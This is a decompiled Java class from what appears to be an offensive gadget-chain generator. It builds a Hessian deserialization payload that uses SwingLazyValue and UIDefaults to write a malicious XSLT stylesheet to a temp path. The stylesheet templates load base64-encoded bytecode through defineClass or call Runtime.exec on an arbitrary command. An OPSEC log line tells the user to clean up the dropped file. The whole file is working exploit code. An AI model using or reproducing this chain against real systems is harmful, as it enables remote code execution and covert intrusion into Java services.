/*
 * Decompiled with CFR 0.152.
 */
package com.ar3h.chains.gadget.impl.hessian.jdk;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.exception.ThrowsUtil;
import com.ar3h.chains.common.param.Choice;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.param.ParamType;
import com.ar3h.chains.common.util.PayloadHelper;
import java.util.HashMap;
import javax.swing.UIDefaults;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import sun.misc.BASE64Encoder;
import sun.swing.SwingLazyValue;

@GadgetTags(tags={"HessianDeserialize"}, nextTags={"BytecodeConvertTag"})
@GadgetAnnotation(name="Xslt\u5199xml\u6587\u4ef6\u94fe", description="\u4f7f\u7528JavaUtils\u5199xml\u6587\u4ef6\uff0c\u4e4b\u540e\u518d\u914d\u5408XsltRead\u8fdb\u884c\u4efb\u610f\u4ee3\u7801\u6267\u884c\n\u6267\u884c\u540e\u4f1a\u5728\u4e34\u65f6\u76ee\u5f55\u4e0b\u751f\u6210xml\u6587\u4ef6\uff0c\u4f8b\u5982 /tmp/data_temp", dependencies={"jdk"})
public class XsltWrite
implements Gadget {
    private static final Logger log = LoggerFactory.getLogger(XsltWrite.class);
    @Param(name="\u76ee\u6807\u64cd\u4f5c\u7cfb\u7edf", description="\u53ef\u9009 {linux, windows}\uff0c\u5bf9\u5e94\u8def\u5f84\u5982\u4e0b\uff1a\nlinux: /tmp/data_temp\nwindows: C:\\Windows\\Temp\\data_temp", type=ParamType.Choice, choices={@Choice(value="windows"), @Choice(value="linux")})
    public String os = "linux";
    @Param(name="\u8def\u5f84", description="\u6307\u5b9a\u8def\u5f84\uff0c\u8be5\u9009\u9879\u4f1a\u8986\u76d6os\u9009\u9879\u4e2d\u5bf9\u5e94\u7684\u8def\u5f84\u53c2\u6570\uff0c\u6d4b\u8bd5\u53d1\u73b0\u4f7f\u7528\u76f8\u5bf9\u8def\u5f84\u5b58\u5728\u95ee\u9898\uff0c\u5efa\u8bae\u4f7f\u7528\u7edd\u5bf9\u8def\u5f84", requires=false)
    public String path;
    public String className;
    static final String xsltTemplate = "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"\nxmlns:b64=\"http://xml.apache.org/xalan/java/sun.misc.BASE64Decoder\"\nxmlns:ob=\"http://xml.apache.org/xalan/java/java.lang.Object\"\nxmlns:th=\"http://xml.apache.org/xalan/java/java.lang.Thread\"\nxmlns:ru=\"http://xml.apache.org/xalan/java/org.springframework.cglib.core.ReflectUtils\"\n>\n    <xsl:template match=\"/\">\n      <xsl:variable name=\"bs\" select=\"b64:decodeBuffer(b64:new(),'<base64_payload>')\"/>\n      <xsl:variable name=\"cl\" select=\"th:getContextClassLoader(th:currentThread())\"/>\n      <xsl:variable name=\"rce\" select=\"ru:defineClass('<class_name>',$bs,$cl)\"/>\n      <xsl:value-of select=\"$rce\"/>\n    </xsl:template>\n  </xsl:stylesheet>";
    static final String xsltTemplateJustRce = "<xsl:stylesheet version=\"2.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" xmlns:java=\"http://saxon.sf.net/java-type\">\n    <xsl:template match=\"/\">\n    <xsl:value-of select=\"Runtime:exec(Runtime:getRuntime(),'<command>')\" xmlns:Runtime=\"java.lang.Runtime\"/>\n    </xsl:template>\n</xsl:stylesheet>";

    public Object getObject(byte[] bytecode) throws Exception {
        String tmpPath = null;
        if ("linux".equalsIgnoreCase(this.os)) {
            tmpPath = "/tmp/data_temp";
        } else if ("windows".equalsIgnoreCase(this.os)) {
            tmpPath = "C:\\Windows\\Temp\\data_temp";
        } else {
            ThrowsUtil.throwGadgetException("Unsupported os: " + this.os);
        }
        if (this.path != null && !this.path.isEmpty()) {
            tmpPath = this.path;
        }
        log.warn("[OPSEC] you need to clean the target file: {}", (Object)tmpPath);
        String base64Code = new BASE64Encoder().encode(bytecode).replaceAll("\r\n", "").replaceAll("\n", "");
        String xslt = xsltTemplate.replace("<base64_payload>", base64Code).replace("<class_name>", this.className);
        SwingLazyValue value = new SwingLazyValue("com.sun.org.apache.xml.internal.security.utils.JavaUtils", "writeBytesToFilename", new Object[]{tmpPath, xslt.getBytes()});
        UIDefaults u1 = new UIDefaults();
        UIDefaults u2 = new UIDefaults();
        u1.put("gadget-chains", value);
        u2.put("gadget-chains", value);
        HashMap map = PayloadHelper.makeMap(u1, u2);
        return map;
    }

    @Override
    public Object invoke(GadgetContext context, GadgetChain chain) throws Exception {
        byte[] bytecode = (byte[])chain.doCreate(context);
        this.className = context.getString(ContextTag.CLASS_NAME_KEY);
        return this.getObject(bytecode);
    }
}

